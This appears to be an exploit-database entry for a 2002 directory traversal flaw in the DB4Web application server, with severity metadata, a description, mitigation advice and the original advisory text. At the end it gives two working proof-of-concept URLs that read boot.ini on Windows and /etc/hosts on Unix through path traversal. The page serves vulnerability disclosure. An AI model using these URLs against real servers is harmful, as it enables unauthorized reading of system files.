header-logo
Suggest Exploit
vendor:
DB4Web
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: DB4Web
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Unix
2002

DB4Web Directory Traversal Vulnerability

A directory traversal bug exists in DB4Web. By passing a maliciously crafted query to the application, an attacker can potentially gain access to arbitrary system files. This is due to the application insufficiently validating the user supplied input.

Mitigation:

Input validation should be performed to ensure that user supplied input is not used to access arbitrary system files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5723/info

DB4Web is an application server that allows read and write access to relational databases and other information sources, via the web. The application is available for Windows, Linux, and various Unix platforms.

A directory traversal bug exists in DB4Web.

By passing a maliciously crafted query to the application, an attacker can potentially gain access to arbitrary system files. This is due to the application insufficiently validating the user supplied input.

On MS Windows systems the URL to retrieve the boot.ini file would
look like:
http://db4web.server.system/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini

On Linux/Unix servers the following URL will show /etc/hosts:
http://db4web.server.system/cgi-bin/db4web_c/dbdirname//etc/hosts